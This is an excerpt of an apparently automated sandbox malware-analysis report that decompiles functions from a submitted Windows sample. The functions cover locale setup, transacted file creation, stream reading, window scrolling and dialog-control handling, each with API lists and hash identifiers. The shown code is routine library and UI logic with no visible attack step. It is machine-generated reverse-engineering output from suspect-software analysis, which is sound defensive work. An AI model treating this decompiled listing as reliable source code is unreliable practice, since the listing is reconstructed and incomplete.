      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID:
      • String ID: Edit
      • API String ID: 0-554135844
      • Opcode ID: 4798439f4f1d3b7228a65b70597ff0adccbd6e10946c6c623ddd4645c1955f76
      • Instruction ID: 0ca9162728bc205cd4d8c60ea4a775246b303c99dac257c934377c3413b35067
      • Opcode Fuzzy Hash: 4798439f4f1d3b7228a65b70597ff0adccbd6e10946c6c623ddd4645c1955f76
      • Instruction Fuzzy Hash: FB11E131300202A7EA205B768EC9FEAB7ADEF83774F148426F102D20A2DF65CC11E661
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009A20A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
      Download Yara Rule
      C-Code - Quality: 83%
      			E009A20A0(intOrPtr __ecx, void* __edx, void* __edi, char* _a4) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				char _v32;
				void* __ebx;
				void* __esi;
				signed int _t21;
				char* _t25;
				void* _t39;
				intOrPtr _t41;
				signed int _t43;

				_t39 = __edi;
				_push(0xffffffff);
				_push(0xac7784);
				_push( *[fs:0x0]);
				_t21 =  *0xd0c910; // 0x3a0e8b0c
				_push(_t21 ^ _t43);
				 *[fs:0x0] =  &_v16;
				_t41 = __ecx;
				_v20 = __ecx;
				E00AC5AED(__ecx, 0);
				_v8 = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				 *((char*)(__ecx + 8)) = 0;
				 *((intOrPtr*)(__ecx + 0xc)) = 0;
				 *((char*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0;
				 *((char*)(__ecx + 0x18)) = 0;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				 *((char*)(__ecx + 0x20)) = 0;
				_t25 = _a4;
				_v8 = 4;
				_t47 = _t25;
				if(_t25 == 0) {
					_a4 = "bad locale name";
					E00AAAF07( &_v32,  &_a4);
					_v32 = 0xad6dd0;
					_t25 = E00AAB8C9( &_v32, 0xb0b09c);
				}
				E00AC5D09(0, _t39, _t41, _t47, _t41, _t25);
				 *[fs:0x0] = _v16;
				return _t41;
			}














      0x009a20a0
      0x009a20a3
      0x009a20a5
      0x009a20b0
      0x009a20b6
      0x009a20bd
      0x009a20c1
      0x009a20c7
      0x009a20c9
      0x009a20cf
      0x009a20d4
      0x009a20d7
      0x009a20da
      0x009a20dd
      0x009a20e0
      0x009a20e3
      0x009a20e6
      0x009a20e9
      0x009a20ec
      0x009a20ef
      0x009a20f2
      0x009a20f6
      0x009a20f8
      0x009a2101
      0x009a2108
      0x009a2116
      0x009a211d
      0x009a211d
      0x009a2124
      0x009a2131
      0x009a213e

      APIs
      • std::_Lockit::_Lockit.LIBCPMT ref: 009A20CF
      • std::exception::exception.LIBCMT ref: 009A2108
        • Part of subcall function 00AAAF07: std::exception::_Copy_str.LIBCMT ref: 00AAAF22
      • __CxxThrowException@8.LIBCMT ref: 009A211D
        • Part of subcall function 00AAB8C9: RaiseException.KERNEL32(?,?,009A1977,?,?,?,?,?,009A1977,?,00B0B024,00000000), ref: 00AAB90B
      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 009A2124
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: std::_$Copy_strExceptionException@8Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::_std::exception::exception
      • String ID: bad locale name
      • API String ID: 73090415-1405518554
      • Opcode ID: 3b2611f95c014edd914ffd43fd94d8ced3bdf39a59a0becdbe73e46abd161b14
      • Instruction ID: a2c6141bbb3017277bcf4581974a80542b1c319f6fc3b89666e9fa2425ba720c
      • Opcode Fuzzy Hash: 3b2611f95c014edd914ffd43fd94d8ced3bdf39a59a0becdbe73e46abd161b14
      • Instruction Fuzzy Hash: 4611B2B1904B48AFC711DF69D880A9AFBF8FB19700F40866EF45693741D774A604CBA5
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009C83CA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 46libraryfileloaderCOMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E009C83CA(intOrPtr* __ecx, CHAR* _a4, long _a8, long _a12, struct _SECURITY_ATTRIBUTES* _a16, long _a20, long _a24, intOrPtr _a28) {
				struct HINSTANCE__* _t15;
				intOrPtr* _t21;

				_t21 = __ecx;
				if( *__ecx == 0) {
					if( *((intOrPtr*)(__ecx + 4)) == 0) {
						L6:
						return _t15 | 0xffffffff;
					}
					return CreateFileA(_a4, _a8, _a12, _a16, _a20, _a24, 0);
				}
				_t15 = GetModuleHandleA("kernel32.dll");
				if(_t15 == 0) {
					goto L6;
				}
				_t15 = GetProcAddress(_t15, "CreateFileTransactedA");
				if(_t15 == 0) {
					goto L6;
				}
				return _t15->i(_a4, _a8, _a12, _a16, _a20, _a24, _a28,  *_t21, 0, 0);
			}





      0x009c83d1
      0x009c83d7
      0x009c8418
      0x009c8435
      0x00000000
      0x009c8435
      0x00000000
      0x009c842d
      0x009c83de
      0x009c83e6
      0x00000000
      0x00000000
      0x009c83ee
      0x009c83f6
      0x00000000
      0x00000000
      0x00000000

      APIs
      • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,?,009C8FD9,00000000,80000000,00000000,0000000C,00000003,00000080,00000000,?,?,00000000,?), ref: 009C83DE
      • GetProcAddress.KERNEL32(00000000,CreateFileTransactedA), ref: 009C83EE
      • CreateFileA.KERNEL32(?,?,?,00000000,?,?,00000000,00000000,?,?,009C8FD9,00000000,80000000,00000000,0000000C,00000003), ref: 009C842D
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: AddressCreateFileHandleModuleProc
      • String ID: CreateFileTransactedA$kernel32.dll
      • API String ID: 2580138172-3827029016
      • Opcode ID: 06b691966829a306b8c91956669d1eaaa26dfd15a5202602ce1a6fe0e2016838
      • Instruction ID: 966ecf622f9298ed86cf0ee7a33778c7b3d8da16c26b11d729b3b919acc6c9fd
      • Opcode Fuzzy Hash: 06b691966829a306b8c91956669d1eaaa26dfd15a5202602ce1a6fe0e2016838
      • Instruction Fuzzy Hash: 9F01D63240010AFB8F264F95DC08DAB7F2AFB98790B55891AFA6551070DB36C862EB61
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009A30CD Relevance: 7.7, APIs: 5, Instructions: 209COMMON
      Download Yara Rule
      C-Code - Quality: 78%
      			E009A30CD() {
				intOrPtr _v4;
				signed int _v8;
				char _v16;
				signed int _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				signed int _v32;
				signed int _v48;
				signed int _v49;
				char _v56;
				char _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t75;
				signed int _t78;
				signed int _t79;
				signed char _t82;
				void* _t85;
				signed int* _t87;
				signed int _t90;
				signed int* _t94;
				signed int _t97;
				signed char* _t103;
				void* _t105;
				void* _t106;
				signed int _t113;
				signed int _t114;
				intOrPtr* _t119;
				char _t126;
				signed int* _t137;
				void* _t140;
				signed int* _t143;
				signed int _t145;
				signed int _t147;
				void* _t148;
				signed char** _t152;
				signed int _t154;
				signed int _t156;
				void* _t157;
				void* _t159;

				_t75 =  *((intOrPtr*)( *_v24 + 4)) + _v24;
				_t113 =  *(_t75 + 0xc) | 0x00000004;
				if( *((intOrPtr*)(_t75 + 0x38)) == 0) {
					_t113 = _t113 | 0x00000004;
				}
				_t114 = _t113 & 0x00000017;
				 *(_t75 + 0xc) = _t114;
				if(( *(_t75 + 0x10) & _t114) != 0) {
					E00AAB8C9(0, 0);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_t154 = _t156;
					_push(0xffffffff);
					_push(0xac79f8);
					_push( *[fs:0x0]);
					_t157 = _t156 - 0x2c;
					_t78 =  *0xd0c910; // 0x3a0e8b0c
					_t79 = _t78 ^ _t154;
					_v20 = _t79;
					_push(_t105);
					_push(_t79);
					 *[fs:0x0] =  &_v16;
					_t147 = _t114;
					_t82 =  *( *(_t147 + 0x20));
					_t136 = 0;
					__eflags = _t82;
					if(_t82 == 0) {
						L8:
						__eflags =  *(_t147 + 0x54) - _t136;
						if( *(_t147 + 0x54) == _t136) {
							L30:
							_t83 = _t82 | 0xffffffff;
							__eflags = _t82 | 0xffffffff;
						} else {
							_t119 =  *((intOrPtr*)(_t147 + 0x10));
							_t141 = _t147 + 0x48;
							__eflags =  *_t119 - _t147 + 0x48;
							if( *_t119 == _t147 + 0x48) {
								_t141 =  *((intOrPtr*)(_t147 + 0x3c));
								 *_t119 =  *((intOrPtr*)(_t147 + 0x3c));
								 *( *(_t147 + 0x20)) =  *(_t147 + 0x40);
								__eflags = 0;
								 *((intOrPtr*)( *((intOrPtr*)(_t147 + 0x30)))) = 0;
							}
							__eflags =  *((intOrPtr*)(_t147 + 0x44)) - _t136;
							if(__eflags != 0) {
								_v28 = 0xf;
								_v32 = _t136;
								_v48 = _t136;
								_v8 = _t136;
								_t136 =  *(_t147 + 0x54);
								_push( *(_t147 + 0x54));
								_t85 = E00AABC81(_t105, _t141, _t147, __eflags);
								_t159 = _t157 + 4;
								__eflags = _t85 - 0xffffffff;
								if(_t85 == 0xffffffff) {
									L29:
									_t82 = E009A27D0( &_v48);
									goto L30;
								} else {
									while(1) {
										E009A2E10( &_v48, 1, _t85);
										_t87 = _v48;
										_t137 = _t87;
										__eflags = _v28 - 0x10;
										if(_v28 < 0x10) {
											_t137 =  &_v48;
											_t87 = _t137;
										}
										_t136 = _t137 + _v32;
										_t142 =  *((intOrPtr*)( *((intOrPtr*)(_t147 + 0x44))));
										_t110 =  &_v56;
										_t90 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t147 + 0x44)))) + 0x10))))(_t147 + 0x4c, _t87, _t137 + _v32,  &_v56,  &_v49,  &_v48,  &_v60);
										__eflags = _t90;
										if(_t90 < 0) {
											goto L29;
										}
										__eflags = _t90 - 1;
										if(_t90 <= 1) {
											__eflags = _v60 -  &_v49;
											if(_v60 !=  &_v49) {
												__eflags = _v28 - 0x10;
												_t143 = _v48;
												if(_v28 < 0x10) {
													_t143 =  &_v48;
												}
												_t145 = _t143 - _v56 + _v32;
												__eflags = _t145;
												while(__eflags > 0) {
													_t136 =  *(_t147 + 0x54);
													_t126 =  *((char*)(_t145 + _v56 - 1));
													_t145 = _t145 - 1;
													_push( *(_t147 + 0x54));
													_push(_t126);
													E00AABF54(_t110, _t145, _t147, __eflags);
													_t159 = _t159 + 8;
													__eflags = _t145;
												}
												E009A27D0( &_v48);
												_t83 = _v49 & 0x000000ff;
											} else {
												__eflags = _v28 - 0x10;
												_t94 = _v48;
												if(_v28 < 0x10) {
													_t94 =  &_v48;
												}
												_t136 = _v56 - _t94;
												__eflags = _v56 - _t94;
												E009A29E0( &_v48, 0, _v56 - _t94);
												goto L28;
											}
										} else {
											__eflags = _t90 - 3;
											if(_t90 != 3) {
												goto L29;
											} else {
												__eflags = _v32 - 1;
												if(__eflags < 0) {
													L28:
													_push( *(_t147 + 0x54));
													_t85 = E00AABC81(_t110, _t142, _t147, __eflags);
													_t159 = _t159 + 4;
													__eflags = _t85 - 0xffffffff;
													if(_t85 != 0xffffffff) {
														continue;
													} else {
														goto L29;
													}
												} else {
													__eflags = _v28 - 0x10;
													_t97 = _v48;
													if(_v28 < 0x10) {
														_t97 =  &_v48;
													}
													E00AAC44E( &_v49, 1, _t97, 1);
													E009A27D0( &_v48);
													_t83 = _v49 & 0x000000ff;
												}
											}
										}
										goto L31;
									}
									goto L29;
								}
							} else {
								_push( *(_t147 + 0x54));
								_t82 = E00AABC81(_t105, _t141,  *(_t147 + 0x54), __eflags);
								__eflags = _t82 - 0xffffffff;
								if(_t82 == 0xffffffff) {
									goto L30;
								} else {
									_t83 = _t82 & 0x000000ff;
								}
							}
						}
					} else {
						_t82 =  *( *(_t147 + 0x20));
						__eflags = _t82 -  *((intOrPtr*)( *((intOrPtr*)(_t147 + 0x30)))) + _t82;
						if(_t82 >=  *((intOrPtr*)( *((intOrPtr*)(_t147 + 0x30)))) + _t82) {
							goto L8;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t147 + 0x30)))) =  *((intOrPtr*)( *((intOrPtr*)(_t147 + 0x30)))) - 1;
							_t152 =  *(_t147 + 0x20);
							_t103 =  *_t152;
							_t136 =  &(_t103[1]);
							 *_t152 =  &(_t103[1]);
							_t83 =  *_t103 & 0x000000ff;
						}
					}
					L31:
					 *[fs:0x0] = _v16;
					_pop(_t140);
					_pop(_t148);
					_pop(_t106);
					__eflags = _v20 ^ _t154;
					return E00AAB46A(_t83, _t106, _v20 ^ _t154, _t136, _t140, _t148);
				} else {
					_v4 = 1;
					return E009A30FE;
				}
			}












































      0x009a30d5
      0x009a30da
      0x009a30e1
      0x009a30e3
      0x009a30e3
      0x009a30e6
      0x009a30e9
      0x009a30ef
      0x009a3171
      0x009a3176
      0x009a3177
      0x009a3178
      0x009a3179
      0x009a317a
      0x009a317b
      0x009a317c
      0x009a317d
      0x009a317e
      0x009a317f
      0x009a3181
      0x009a3183
      0x009a3185
      0x009a3190
      0x009a3191
      0x009a3194
      0x009a3199
      0x009a319b
      0x009a319e
      0x009a31a1
      0x009a31a5
      0x009a31ab
      0x009a31b0
      0x009a31b2
      0x009a31b4
      0x009a31b6
      0x009a31df
      0x009a31df
      0x009a31e2
      0x009a330f
      0x009a330f
      0x009a330f
      0x009a31e8
      0x009a31e8
      0x009a31eb
      0x009a31ee
      0x009a31f0
      0x009a31f5
      0x009a31f8
      0x009a31fd
      0x009a3202
      0x009a3204
      0x009a3204
      0x009a3206
      0x009a3209
      0x009a3228
      0x009a322f
      0x009a3232
      0x009a3235
      0x009a3238
      0x009a323b
      0x009a323c
      0x009a3241
      0x009a3244
      0x009a3247
      0x009a3307
      0x009a330a
      0x00000000
      0x009a324d
      0x009a324d
      0x009a3253
      0x009a325b
      0x009a325e
      0x009a3260
      0x009a3263
      0x009a3265
      0x009a3268
      0x009a3268
      0x009a326a
      0x009a3270
      0x009a327e
      0x009a328b
      0x009a328d
      0x009a328f
      0x00000000
      0x00000000
      0x009a3291
      0x009a3294
      0x009a32d1
      0x009a32d4
      0x009a332e
      0x009a3332
      0x009a3335
      0x009a3337
      0x009a3337
      0x009a333d
      0x009a3340
      0x009a3342
      0x009a3347
      0x009a334a
      0x009a334f
      0x009a3350
      0x009a3351
      0x009a3352
      0x009a3357
      0x009a335a
      0x009a335a
      0x009a3365
      0x009a336a
      0x009a32d6
      0x009a32d6
      0x009a32da
      0x009a32dd
      0x009a32df
      0x009a32df
      0x009a32e5
      0x009a32e5
      0x009a32ed
      0x00000000
      0x009a32ed
      0x009a3296
      0x009a3296
      0x009a3299
      0x00000000
      0x009a329b
      0x009a329b
      0x009a329f
      0x009a32f2
      0x009a32f5
      0x009a32f6
      0x009a32fb
      0x009a32fe
      0x009a3301
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x009a32a1
      0x009a32a1
      0x009a32a5
      0x009a32a8
      0x009a32aa
      0x009a32aa
      0x009a32b6
      0x009a32c5
      0x009a32ca
      0x009a32ca
      0x009a329f
      0x009a3299
      0x00000000
      0x009a3294
      0x00000000
      0x009a324d
      0x009a320b
      0x009a320e
      0x009a320f
      0x009a3217
      0x009a321a
      0x00000000
      0x009a3220
      0x009a3220
      0x009a3220
      0x009a321a
      0x009a3209
      0x009a31b8
      0x009a31bb
      0x009a31c4
      0x009a31c6
      0x00000000
      0x009a31c8
      0x009a31cb
      0x009a31cd
      0x009a31d0
      0x009a31d2
      0x009a31d5
      0x009a31d7
      0x009a31d7
      0x009a31c6
      0x009a3312
      0x009a3315
      0x009a331d
      0x009a331e
      0x009a331f
      0x009a3323
      0x009a332d
      0x009a30f1
      0x009a30f1
      0x009a30fd
      0x009a30fd

      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 6aedb38ef9cf2e9c5bafa74a8d2b17660ebf4bb3cf6a4e74d15b8ef21cec2c65
      • Instruction ID: 97d9aa98ad1a28ac7274a18f211f6c582542d6b38dde3f1f1092e98b1b223580
      • Opcode Fuzzy Hash: 6aedb38ef9cf2e9c5bafa74a8d2b17660ebf4bb3cf6a4e74d15b8ef21cec2c65
      • Instruction Fuzzy Hash: 7F718171A046089FCB24CFACC881AAEB7B5FF4A314F508919F456A7691DB31FA04CF90
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009ABEBE Relevance: 7.6, APIs: 5, Instructions: 81windowCOMMON
      Download Yara Rule
      C-Code - Quality: 67%
      			E009ABEBE(intOrPtr* __ecx, void* __edx, int _a4, int _a8, RECT* _a12, struct HWND__* _a16) {
				signed int _v8;
				struct tagRECT _v24;
				RECT* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				struct HWND__* _t45;
				void* _t51;
				intOrPtr* _t53;
				signed int _t54;

				_t51 = __edx;
				_t29 =  *0xd0c910; // 0x3a0e8b0c
				_v8 = _t29 ^ _t54;
				_t45 = _a16;
				_t53 = __ecx;
				_v28 = _a12;
				if(IsWindowVisible( *(__ecx + 0x20)) != 0 || _v28 != 0 || _t45 != 0) {
					_t33 = ScrollWindow( *(_t53 + 0x20), _a4, _a8, _v28, _t45);
				} else {
					_push(5);
					_push( *(_t53 + 0x20));
					while(1) {
						_t45 = GetWindow();
						if(_t45 == 0) {
							break;
						}
						_v24.left = 0;
						_v24.top = 0;
						_v24.right = 0;
						_v24.bottom = 0;
						GetWindowRect(_t45,  &_v24);
						E009BAAA3(_t53,  &_v24);
						SetWindowPos(_t45, 0, _v24.left + _a4, _v24.top + _a8, 0, 0, 0x15);
						_push(2);
						_push(_t45);
					}
				}
				if( *((intOrPtr*)(_t53 + 0x68)) != 0 && _v28 == 0) {
					_t53 =  *((intOrPtr*)(_t53 + 0x68));
					_t33 =  *((intOrPtr*)( *_t53 + 0x5c))(_a4, _a8);
				}
				return E00AAB46A(_t33, _t45, _v8 ^ _t54, _t51, 0, _t53);
			}














      0x009abebe
      0x009abec6
      0x009abecd
      0x009abed4
      0x009abed9
      0x009abede
      0x009abeeb
      0x009abf57
      0x009abef6
      0x009abef6
      0x009abef8
      0x009abf3c
      0x009abf42
      0x009abf46
      0x00000000
      0x00000000
      0x009abf02
      0x009abf05
      0x009abf08
      0x009abf0b
      0x009abf0e
      0x009abf1a
      0x009abf33
      0x009abf39
      0x009abf3b
      0x009abf3b
      0x009abf48
      0x009abf60
      0x009abf6a
      0x009abf74
      0x009abf74
      0x009abf85

      APIs
      • IsWindowVisible.USER32(?), ref: 009ABEE1
      • GetWindowRect.USER32 ref: 009ABF0E
      • SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,00000015,?), ref: 009ABF33
      • GetWindow.USER32(?,00000005), ref: 009ABF3C
      • ScrollWindow.USER32 ref: 009ABF57
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Window$RectScrollVisible
      • String ID:
      • API String ID: 2639402888-0
      • Opcode ID: 3aa3549634c938cb1f1fb5b645e19dfeb295df7b747692443c6cd11675b281ff
      • Instruction ID: a09110832651544d15c29c58e5d8a0fa3181818c7b4cc31457c4de7d88a9aead
      • Opcode Fuzzy Hash: 3aa3549634c938cb1f1fb5b645e19dfeb295df7b747692443c6cd11675b281ff
      • Instruction Fuzzy Hash: D6214B72900209EFCF11DFA5CC89DAEBBB9FF89310F14441AF546A2212D7719A50DFA0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009ADA0E Relevance: 7.6, APIs: 5, Instructions: 80windowCOMMON
      Download Yara Rule
      C-Code - Quality: 97%
      			E009ADA0E(signed int __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				struct HWND__* _t29;
				signed int _t32;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t54;
				void* _t55;
				void* _t56;

				_t56 = __eflags;
				_t49 = __edx;
				_t42 = __ebx;
				_push(0xa0);
				E00AAD232(0xac806b, __ebx, __edi, __esi);
				 *(_t55 - 0x10) = __ecx;
				E009B056D(_t55 - 0x38);
				_t45 = _t55 - 0xac;
				E009AB862(_t55 - 0xac, __edx, _t56);
				 *(_t55 - 4) = 0;
				_t29 = GetTopWindow( *(__ecx + 0x20));
				while(1) {
					_t54 = _t29;
					if(_t54 == 0) {
						break;
					}
					 *(_t55 - 0x8c) = _t54;
					 *((intOrPtr*)(_t55 - 0x34)) = GetDlgCtrlID(_t54);
					 *((intOrPtr*)(_t55 - 0x24)) = _t55 - 0xac;
					_t32 = E009AC937(_t42, _t45, _t49, 0, _t54, __eflags, _t54);
					__eflags = _t32;
					if(_t32 == 0) {
						L3:
						_t45 =  *(_t55 - 0x10);
						__eflags = E009B03EE( *(_t55 - 0x10), 0, _t54,  *((intOrPtr*)(_t55 - 0x34)), 0xffffffff, _t55 - 0x38, 0);
						if(__eflags == 0) {
							_t42 =  *(_t55 + 0xc);
							__eflags = _t42;
							if(_t42 != 0) {
								_t36 = SendMessageA( *(_t55 - 0x8c), 0x87, 0, 0);
								__eflags = _t36 & 0x00002000;
								if((_t36 & 0x00002000) == 0) {
									L10:
									_t42 = 0;
									__eflags = 0;
								} else {
									_t38 = E009B0A7A(_t55 - 0xac) & 0x0000000f;
									__eflags = _t38 - 3;
									if(_t38 == 3) {
										goto L10;
									} else {
										__eflags = _t38 - 6;
										if(_t38 == 6) {
											goto L10;
										} else {
											__eflags = _t38 - 7;
											if(_t38 == 7) {
												goto L10;
											} else {
												__eflags = _t38 - 9;
												if(_t38 == 9) {
													goto L10;
												}
											}
										}
									}
								}
							}
							_t45 = _t55 - 0x38;
							E009B0593(_t55 - 0x38,  *((intOrPtr*)(_t55 + 8)), _t42);
						}
					} else {
						_t45 = _t32;
						__eflags = E009B03EE(_t32, 0, _t54, 0, 0xbd11ffff, _t55 - 0x38, 0);
						if(__eflags == 0) {
							goto L3;
						}
					}
					_t29 = GetWindow(_t54, 2);
				}
				_t21 = _t55 - 4;
				 *(_t55 - 4) =  *(_t55 - 4) | 0xffffffff;
				 *(_t55 - 0x8c) = 0;
				return E00AAD30A(E009AD6CC(_t42, _t55 - 0xac, _t49, 0, _t54,  *_t21));
			}










      0x009ada0e
      0x009ada0e
      0x009ada0e
      0x009ada0e
      0x009ada18
      0x009ada1f
      0x009ada25
      0x009ada2a
      0x009ada30
      0x009ada3a
      0x009ada3d
      0x009adaf1
      0x009adaf1
      0x009adaf5
      0x00000000
      0x00000000
      0x009ada49
      0x009ada55
      0x009ada5f
      0x009ada62
      0x009ada67
      0x009ada69
      0x009ada81
      0x009ada81
      0x009ada93
      0x009ada95
      0x009ada97
      0x009ada9a
      0x009ada9c
      0x009adaab
      0x009adab1
      0x009adab6
      0x009adada
      0x009adada
      0x009adada
      0x009adab8
      0x009adac3
      0x009adac6
      0x009adac9
      0x00000000
      0x009adacb
      0x009adacb
      0x009adace
      0x00000000
      0x009adad0
      0x009adad0
      0x009adad3
      0x00000000
      0x009adad5
      0x009adad5
      0x009adad8
      0x00000000
      0x00000000
      0x009adad8
      0x009adad3
      0x009adace
      0x009adac9
      0x009adab6
      0x009adae0
      0x009adae3
      0x009adae3
      0x009ada6b
      0x009ada76
      0x009ada7d
      0x009ada7f
      0x00000000
      0x00000000
      0x009ada7f
      0x009adaeb
      0x009adaeb
      0x009adafb
      0x009adafb
      0x009adb05
      0x009adb15

      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
